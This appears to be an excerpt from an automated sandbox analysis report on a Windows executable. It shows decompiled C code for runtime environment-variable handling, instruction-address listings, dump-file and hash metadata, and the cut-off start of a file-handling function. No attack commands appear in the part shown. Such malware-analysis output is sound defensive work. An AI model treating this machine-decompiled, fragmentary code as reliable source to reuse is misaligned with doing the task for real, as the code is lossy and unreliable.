																				_v16 = _t82;
																				_t304 = E00440628(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E004414D5(_t304);
																					goto L56;
																				} else {
																					_t148 = E004428B4(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E00437736();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E00440628(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E00440C29(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E004414D5(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E00440628(_t262, _t95, 1);
																										E004414D5(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E0043CAAC( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E00437736();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E00440628(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E00440C29(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E004414D5(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E00440628(_t267 - _t284 >> 1, _t107, 2);
																																E004414D5(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E004428B4( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E00437736();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46d4d0; // 0x65eb40
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004446BC(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E00438932();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46d4d0; // 0x65eb40
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46d4d4 = E00440628(_t246, 1, 4);
																				E004414D5(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46d4d0 = E00440628(_t246, 1, 4);
																				E004414D5(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46d4d0 - _t221; // 0x65eb40
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46d4d4; // 0x676fa0
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043E6DB(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46d4d4; // 0x676fa0
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E004414D5(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E00438932();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E00438932();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46d4d0 = E00440628(_t231, 1, 4);
										E004414D5(_t218);
										_t298 =  *0x46d4d0; // 0x65eb40
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46d4d4 - _t218; // 0x676fa0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46d4d4 = E00440628(_t231, 1, 4);
												E004414D5(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46d4d4 - _t218; // 0x676fa0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46d4d4 - _t218; // 0x676fa0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043E6D6(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46d4d0; // 0x65eb40
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E004414D5(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E00438932();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}








































































































                                                                                                0x00448906
                                                                                                0x0044890b
                                                                                                0x00448922
                                                                                                0x00448924
                                                                                                0x00448929
                                                                                                0x0044892d
                                                                                                0x0044892e
                                                                                                0x00448930
                                                                                                0x00448980
                                                                                                0x00448985
                                                                                                0x00000000
                                                                                                0x00448932
                                                                                                0x00448932
                                                                                                0x00448934
                                                                                                0x00000000
                                                                                                0x00448936
                                                                                                0x00448936
                                                                                                0x0044893a
                                                                                                0x00448940
                                                                                                0x00448943
                                                                                                0x00448946
                                                                                                0x0044894c
                                                                                                0x0044894f
                                                                                                0x00448954
                                                                                                0x00448956
                                                                                                0x00448959
                                                                                                0x0044895a
                                                                                                0x0044895a
                                                                                                0x00448960
                                                                                                0x00448962
                                                                                                0x00448964
                                                                                                0x004489f8
                                                                                                0x004489fb
                                                                                                0x004489fd
                                                                                                0x004489ff
                                                                                                0x00448a00
                                                                                                0x00448a01
                                                                                                0x00448a06
                                                                                                0x00448a0b
                                                                                                0x00448a0d
                                                                                                0x00448a57
                                                                                                0x00448a57
                                                                                                0x00448a5a
                                                                                                0x00000000
                                                                                                0x00448a60
                                                                                                0x00448a60
                                                                                                0x00448a62
                                                                                                0x00448a65
                                                                                                0x00448a65
                                                                                                0x00448a68
                                                                                                0x00448a6a
                                                                                                0x00000000
                                                                                                0x00448a70
                                                                                                0x00448a70
                                                                                                0x00448a76
                                                                                                0x00000000
                                                                                                0x00448a7c
                                                                                                0x00448a7c
                                                                                                0x00448a7e
                                                                                                0x00448a86
                                                                                                0x00448a88
                                                                                                0x00448a8d
                                                                                                0x00448a90
                                                                                                0x00448a92
                                                                                                0x00000000
                                                                                                0x00448a98
                                                                                                0x00448a98
                                                                                                0x00448a9b
                                                                                                0x00448a9d
                                                                                                0x00448aa0
                                                                                                0x00448aa3
                                                                                                0x00000000
                                                                                                0x00448aa3
                                                                                                0x00448a92
                                                                                                0x00448a76
                                                                                                0x00448a6a
                                                                                                0x00448a0f
                                                                                                0x00448a0f
                                                                                                0x00448a11
                                                                                                0x00000000
                                                                                                0x00448a13
                                                                                                0x00448a16
                                                                                                0x00448a1c
                                                                                                0x00448a1f
                                                                                                0x00448a22
                                                                                                0x00448a36
                                                                                                0x00448a36
                                                                                                0x00448a39
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448a32
                                                                                                0x00448a35
                                                                                                0x00448a35
                                                                                                0x00448a35
                                                                                                0x00448a3b
                                                                                                0x00448a3d
                                                                                                0x00448a45
                                                                                                0x00448a47
                                                                                                0x00448a4c
                                                                                                0x00448a4f
                                                                                                0x00448a51
                                                                                                0x00448a53
                                                                                                0x00448aa7
                                                                                                0x00448aa7
                                                                                                0x00448aa7
                                                                                                0x00448a24
                                                                                                0x00448a24
                                                                                                0x00448a27
                                                                                                0x00448a29
                                                                                                0x00448a29
                                                                                                0x00448aad
                                                                                                0x00448ab0
                                                                                                0x00000000
                                                                                                0x00448ab6
                                                                                                0x00448ab6
                                                                                                0x00448ab8
                                                                                                0x00448abb
                                                                                                0x00448abb
                                                                                                0x00448abd
                                                                                                0x00448abe
                                                                                                0x00448abe
                                                                                                0x00448aca
                                                                                                0x00448ad2
                                                                                                0x00448ad5
                                                                                                0x00448ad6
                                                                                                0x00448ad8
                                                                                                0x00448b21
                                                                                                0x00448b22
                                                                                                0x00000000
                                                                                                0x00448ada
                                                                                                0x00448ae1
                                                                                                0x00448ae6
                                                                                                0x00448ae9
                                                                                                0x00448aeb
                                                                                                0x00448b2d
                                                                                                0x00448b2e
                                                                                                0x00448b2f
                                                                                                0x00448b30
                                                                                                0x00448b31
                                                                                                0x00448b32
                                                                                                0x00448b37
                                                                                                0x00448b3b
                                                                                                0x00448b3d
                                                                                                0x00448b40
                                                                                                0x00448b41
                                                                                                0x00448b44
                                                                                                0x00448b46
                                                                                                0x00448b58
                                                                                                0x00448b59
                                                                                                0x00448b5a
                                                                                                0x00448b5d
                                                                                                0x00448b5f
                                                                                                0x00448b64
                                                                                                0x00448b68
                                                                                                0x00448b69
                                                                                                0x00448b6b
                                                                                                0x00448bbc
                                                                                                0x00448bc1
                                                                                                0x00000000
                                                                                                0x00448b6d
                                                                                                0x00448b6d
                                                                                                0x00448b6f
                                                                                                0x00000000
                                                                                                0x00448b71
                                                                                                0x00448b71
                                                                                                0x00448b77
                                                                                                0x00448b79
                                                                                                0x00448b7d
                                                                                                0x00448b80
                                                                                                0x00448b83
                                                                                                0x00448b89
                                                                                                0x00448b8b
                                                                                                0x00448b8c
                                                                                                0x00448b92
                                                                                                0x00448b95
                                                                                                0x00448b97
                                                                                                0x00448b97
                                                                                                0x00448b9d
                                                                                                0x00448b9f
                                                                                                0x00448c2c
                                                                                                0x00448c37
                                                                                                0x00448c3a
                                                                                                0x00448c3f
                                                                                                0x00448c44
                                                                                                0x00448c46
                                                                                                0x00448c90
                                                                                                0x00448c90
                                                                                                0x00448c93
                                                                                                0x00000000
                                                                                                0x00448c99
                                                                                                0x00448c99
                                                                                                0x00448c9b
                                                                                                0x00448c9e
                                                                                                0x00448c9e
                                                                                                0x00448ca1
                                                                                                0x00448ca3
                                                                                                0x00000000
                                                                                                0x00448ca9
                                                                                                0x00448ca9
                                                                                                0x00448caf
                                                                                                0x00000000
                                                                                                0x00448cb5
                                                                                                0x00448cb5
                                                                                                0x00448cb7
                                                                                                0x00448cbf
                                                                                                0x00448cc1
                                                                                                0x00448cc6
                                                                                                0x00448cc9
                                                                                                0x00448ccb
                                                                                                0x00000000
                                                                                                0x00448cd1
                                                                                                0x00448cd1
                                                                                                0x00448cd4
                                                                                                0x00448cd6
                                                                                                0x00448cd9
                                                                                                0x00448cdc
                                                                                                0x00000000
                                                                                                0x00448cdc
                                                                                                0x00448ccb
                                                                                                0x00448caf
                                                                                                0x00448ca3
                                                                                                0x00448c48
                                                                                                0x00448c48
                                                                                                0x00448c4a
                                                                                                0x00000000
                                                                                                0x00448c4c
                                                                                                0x00448c4f
                                                                                                0x00448c55
                                                                                                0x00448c58
                                                                                                0x00448c5b
                                                                                                0x00448c6f
                                                                                                0x00448c6f
                                                                                                0x00448c72
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448c6b
                                                                                                0x00448c6e
                                                                                                0x00448c6e
                                                                                                0x00448c6e
                                                                                                0x00448c74
                                                                                                0x00448c76
                                                                                                0x00448c7e
                                                                                                0x00448c80
                                                                                                0x00448c85
                                                                                                0x00448c88
                                                                                                0x00448c8a
                                                                                                0x00448c8c
                                                                                                0x00448ce0
                                                                                                0x00448ce0
                                                                                                0x00448ce0
                                                                                                0x00448c5d
                                                                                                0x00448c5d
                                                                                                0x00448c60
                                                                                                0x00448c62
                                                                                                0x00448c62
                                                                                                0x00448ce6
                                                                                                0x00448ce9
                                                                                                0x00000000
                                                                                                0x00448cef
                                                                                                0x00448cef
                                                                                                0x00448cf1
                                                                                                0x00448cf1
                                                                                                0x00448cf4
                                                                                                0x00448cf4
                                                                                                0x00448cf7
                                                                                                0x00448cfa
                                                                                                0x00448cfa
                                                                                                0x00448d05
                                                                                                0x00448d09
                                                                                                0x00448d11
                                                                                                0x00448d14
                                                                                                0x00448d15
                                                                                                0x00448d17
                                                                                                0x00448d5e
                                                                                                0x00448d5f
                                                                                                0x00000000
                                                                                                0x00448d19
                                                                                                0x00448d21
                                                                                                0x00448d26
                                                                                                0x00448d29
                                                                                                0x00448d2b
                                                                                                0x00448d6a
                                                                                                0x00448d6b
                                                                                                0x00448d6c
                                                                                                0x00448d6d
                                                                                                0x00448d6e
                                                                                                0x00448d6f
                                                                                                0x00448d74
                                                                                                0x00448d77
                                                                                                0x00448d78
                                                                                                0x00448d7b
                                                                                                0x00448d7c
                                                                                                0x00448d7f
                                                                                                0x00448d81
                                                                                                0x00448d8a
                                                                                                0x00448d8c
                                                                                                0x00448d8e
                                                                                                0x00448d90
                                                                                                0x00448d92
                                                                                                0x00448d92
                                                                                                0x00448d95
                                                                                                0x00448d96
                                                                                                0x00448d96
                                                                                                0x00448d92
                                                                                                0x00448d9c
                                                                                                0x00448da7
                                                                                                0x00448daa
                                                                                                0x00448dab
                                                                                                0x00448dad
                                                                                                0x00448e14
                                                                                                0x00448e14
                                                                                                0x00000000
                                                                                                0x00448daf
                                                                                                0x00448daf
                                                                                                0x00448db2
                                                                                                0x00448e04
                                                                                                0x00448e06
                                                                                                0x00448e0c
                                                                                                0x00000000
                                                                                                0x00448db4
                                                                                                0x00448db4
                                                                                                0x00448db7
                                                                                                0x00448db7
                                                                                                0x00448db9
                                                                                                0x00448db9
                                                                                                0x00448dbb
                                                                                                0x00448dbb
                                                                                                0x00448dbe
                                                                                                0x00448dbe
                                                                                                0x00448dc0
                                                                                                0x00448dc1
                                                                                                0x00448dc1
                                                                                                0x00448dc5
                                                                                                0x00448dc9
                                                                                                0x00448dcd
                                                                                                0x00448dd7
                                                                                                0x00448dda
                                                                                                0x00448ddf
                                                                                                0x00448de2
                                                                                                0x00448de6
                                                                                                0x00000000
                                                                                                0x00448de8
                                                                                                0x00448df0
                                                                                                0x00448df5
                                                                                                0x00448df8
                                                                                                0x00448dfa
                                                                                                0x00448e19
                                                                                                0x00448e1b
                                                                                                0x00448e1c
                                                                                                0x00448e1d
                                                                                                0x00448e1e
                                                                                                0x00448e1f
                                                                                                0x00448e20
                                                                                                0x00448e25
                                                                                                0x00448e28
                                                                                                0x00448e29
                                                                                                0x00448e2b
                                                                                                0x00448e2c
                                                                                                0x00448e2d
                                                                                                0x00448e2e
                                                                                                0x00448e31
                                                                                                0x00448e33
                                                                                                0x00448e3c
                                                                                                0x00448e3d
                                                                                                0x00448e3f
                                                                                                0x00448e41
                                                                                                0x00448e43
                                                                                                0x00448e46
                                                                                                0x00448e47
                                                                                                0x00448e49
                                                                                                0x00448e4b
                                                                                                0x00448e4b
                                                                                                0x00448e4e
                                                                                                0x00448e4f
                                                                                                0x00448e4f
                                                                                                0x00448e4b
                                                                                                0x00448e53
                                                                                                0x00448e5e
                                                                                                0x00448e62
                                                                                                0x00448e64
                                                                                                0x00448ed2
                                                                                                0x00448ed2
                                                                                                0x00000000
                                                                                                0x00448e66
                                                                                                0x00448e66
                                                                                                0x00448e68
                                                                                                0x00448ec2
                                                                                                0x00448ec3
                                                                                                0x00448ec9
                                                                                                0x00000000
                                                                                                0x00448e6a
                                                                                                0x00448e6c
                                                                                                0x00448e6c
                                                                                                0x00448e6e
                                                                                                0x00448e6e
                                                                                                0x00448e70
                                                                                                0x00448e70
                                                                                                0x00448e73
                                                                                                0x00448e73
                                                                                                0x00448e76
                                                                                                0x00448e79
                                                                                                0x00448e79
                                                                                                0x00448e85
                                                                                                0x00448e89
                                                                                                0x00448e91
                                                                                                0x00448e97
                                                                                                0x00448e9c
                                                                                                0x00448e9f
                                                                                                0x00448ea3
                                                                                                0x00000000
                                                                                                0x00448ea5
                                                                                                0x00448ead
                                                                                                0x00448eb2
                                                                                                0x00448eb5
                                                                                                0x00448eb7
                                                                                                0x00448ed7
                                                                                                0x00448ed9
                                                                                                0x00448eda
                                                                                                0x00448edb
                                                                                                0x00448edc
                                                                                                0x00448edd
                                                                                                0x00448ede
                                                                                                0x00448ee3
                                                                                                0x00448ee6
                                                                                                0x00448ee9
                                                                                                0x00448eea
                                                                                                0x00448eeb
                                                                                                0x00448eec
                                                                                                0x00448ef2
                                                                                                0x00448ef4
                                                                                                0x00448ef7
                                                                                                0x00448f23
                                                                                                0x00448f23
                                                                                                0x00448f23
                                                                                                0x00448f28
                                                                                                0x00448ef9
                                                                                                0x00448ef9
                                                                                                0x00448efc
                                                                                                0x00448f02
                                                                                                0x00448f07
                                                                                                0x00448f0a
                                                                                                0x00448f0c
                                                                                                0x00000000
                                                                                                0x00448f0e
                                                                                                0x00448f10
                                                                                                0x00448f13
                                                                                                0x00448f15
                                                                                                0x00448f31
                                                                                                0x00448f33
                                                                                                0x00448f17
                                                                                                0x00448f17
                                                                                                0x00448f19
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448f19
                                                                                                0x00448f15
                                                                                                0x00000000
                                                                                                0x00448f1b
                                                                                                0x00448f1b
                                                                                                0x00448f1e
                                                                                                0x00448f1e
                                                                                                0x00000000
                                                                                                0x00448efc
                                                                                                0x00448f2a
                                                                                                0x00448f30
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448eb7
                                                                                                0x00000000
                                                                                                0x00448eb9
                                                                                                0x00448eb9
                                                                                                0x00448ebc
                                                                                                0x00448ebc
                                                                                                0x00448ec0
                                                                                                0x00448ec0
                                                                                                0x00000000
                                                                                                0x00448ec0
                                                                                                0x00448e68
                                                                                                0x00448e35
                                                                                                0x00448e35
                                                                                                0x00448ecd
                                                                                                0x00448ed1
                                                                                                0x00448ed1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448dfa
                                                                                                0x00000000
                                                                                                0x00448dfc
                                                                                                0x00448dfc
                                                                                                0x00448dff
                                                                                                0x00448dff
                                                                                                0x00000000
                                                                                                0x00448e03
                                                                                                0x00448db2
                                                                                                0x00448d83
                                                                                                0x00448d83
                                                                                                0x00448e0f
                                                                                                0x00448e13
                                                                                                0x00448e13
                                                                                                0x00448d2d
                                                                                                0x00448d31
                                                                                                0x00448d34
                                                                                                0x00448d3e
                                                                                                0x00448d46
                                                                                                0x00448d4c
                                                                                                0x00448d4e
                                                                                                0x00448d50
                                                                                                0x00448d55
                                                                                                0x00448d55
                                                                                                0x00448d58
                                                                                                0x00448d58
                                                                                                0x00000000
                                                                                                0x00448d4e
                                                                                                0x00448d2b
                                                                                                0x00448d17
                                                                                                0x00448ce9
                                                                                                0x00448c4a
                                                                                                0x00448ba5
                                                                                                0x00448ba5
                                                                                                0x00448baa
                                                                                                0x00448bad
                                                                                                0x00448bda
                                                                                                0x00448bda
                                                                                                0x00448bdc
                                                                                                0x00000000
                                                                                                0x00448bde
                                                                                                0x00448bde
                                                                                                0x00448be0
                                                                                                0x00448c0b
                                                                                                0x00448c15
                                                                                                0x00448c1a
                                                                                                0x00448c1f
                                                                                                0x00000000
                                                                                                0x00448be2
                                                                                                0x00448bec
                                                                                                0x00448bf1
                                                                                                0x00448bf6
                                                                                                0x00448bf9
                                                                                                0x00448bff
                                                                                                0x00000000
                                                                                                0x00448c01
                                                                                                0x00448c01
                                                                                                0x00448c07
                                                                                                0x00448c09
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448c09
                                                                                                0x00448bff
                                                                                                0x00448be0
                                                                                                0x00448baf
                                                                                                0x00448baf
                                                                                                0x00448bb1
                                                                                                0x00000000
                                                                                                0x00448bb3
                                                                                                0x00448bb3
                                                                                                0x00448bb8
                                                                                                0x00448bba
                                                                                                0x00448c22
                                                                                                0x00448c22
                                                                                                0x00448c28
                                                                                                0x00448c2a
                                                                                                0x00448bc7
                                                                                                0x00448bc7
                                                                                                0x00448bc7
                                                                                                0x00448bca
                                                                                                0x00448bcb
                                                                                                0x00448bd2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00448bba
                                                                                                0x00448bb1
                                                                                                0x00448bad
                                                                                                0x00448b9f
                                                                                                0x00448b6f
                                                                                                0x00448b48
                                                                                                0x00448b48
                                                                                                0x00448b4d
                                                                                                0x00448b53
                                                                                                0x00448bd5
                                                                                                0x00448bd9
                                                                                                0x00448bd9
                                                                                                0x00448aed
                                                                                                0x00448af6
                                                                                                0x00448afe
                                                                                                0x00448b02
                                                                                                0x00448b09
                                                                                                0x00448b0f
                                                                                                0x00448b11
                                                                                                0x00448b13
                                                                                                0x00448b18
                                                                                                0x00448b18
                                                                                                0x00448b1b
                                                                                                0x00448b1b
                                                                                                0x00000000
                                                                                                0x00448b11
                                                                                                0x00448aeb
                                                                                                0x00448ad8
                                                                                                0x00448ab0
                                                                                                0x00448a11
                                                                                                0x0044896a
                                                                                                0x0044896a
                                                                                                0x0044896d
                                                                                                0x0044899e
                                                                                                0x0044899e
                                                                                                0x004489a0
                                                                                                0x004489b0
                                                                                                0x004489b5
                                                                                                0x004489ba
                                                                                                0x004489c0
                                                                                                0x004489c3
                                                                                                0x004489c5
                                                                                                0x00000000
                                                                                                0x004489c7
                                                                                                0x004489c7
                                                                                                0x004489cd
                                                                                                0x00000000
                                                                                                0x004489cf
                                                                                                0x004489d9
                                                                                                0x004489de
                                                                                                0x004489e3
                                                                                                0x004489e6
                                                                                                0x004489ec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004489ec
                                                                                                0x004489cd
                                                                                                0x004489a2
                                                                                                0x004489a2
                                                                                                0x00000000
                                                                                                0x004489a2
                                                                                                0x0044896f
                                                                                                0x0044896f
                                                                                                0x00448975
                                                                                                0x00000000
                                                                                                0x00448977
                                                                                                0x00448977
                                                                                                0x0044897c
                                                                                                0x0044897e
                                                                                                0x004489ee
                                                                                                0x004489ee
                                                                                                0x004489f4
                                                                                                0x004489f4
                                                                                                0x004489f6
                                                                                                0x0044898b
                                                                                                0x0044898b
                                                                                                0x0044898b
                                                                                                0x0044898e
                                                                                                0x0044898f
                                                                                                0x00448996
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044897e
                                                                                                0x00448975
                                                                                                0x0044896d
                                                                                                0x00448964
                                                                                                0x00448934
                                                                                                0x0044890d
                                                                                                0x0044890d
                                                                                                0x00448912
                                                                                                0x00448918
                                                                                                0x00448999
                                                                                                0x0044899d
                                                                                                0x0044899d
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID: @e
                                                                                                • API String ID: 3899193279-2994471477
                                                                                                • Opcode ID: 51c7febfffcb914fc004e73cb01bdd06029dbff5ce19e3670ad97b46950789d5
                                                                                                • Instruction ID: 6b887ec94c18f0ca6b4e7bee99f304fb77620e93cea1234fee426abd34741106
                                                                                                • Opcode Fuzzy Hash: 51c7febfffcb914fc004e73cb01bdd06029dbff5ce19e3670ad97b46950789d5
                                                                                                • Instruction Fuzzy Hash: 05D126B1E017016FFB20AF658881A7EBBA4EF05364F04016FF945AB381EF79A841875D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040663F, Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 339fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 81%
                                                                                                			E0040663F(intOrPtr __ecx, union _LARGE_INTEGER __edx, void* __eflags, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				union _LARGE_INTEGER _v20;
				union _LARGE_INTEGER* _v24;
				long _v28;
				long _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				signed int _v44;
				signed int _v48;
				struct %anon52 _v56;
				union _LARGE_INTEGER _v60;
				intOrPtr _v64;
				struct %anon52 _v72;
				union _LARGE_INTEGER _v76;
				intOrPtr _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				char _v200;
				char _v224;
				char _v248;
				char _v272;
				char _v296;
				char _v320;
				char _v344;
				char _v368;
				char _v392;
				char _v416;
				char _v440;
				char _v464;
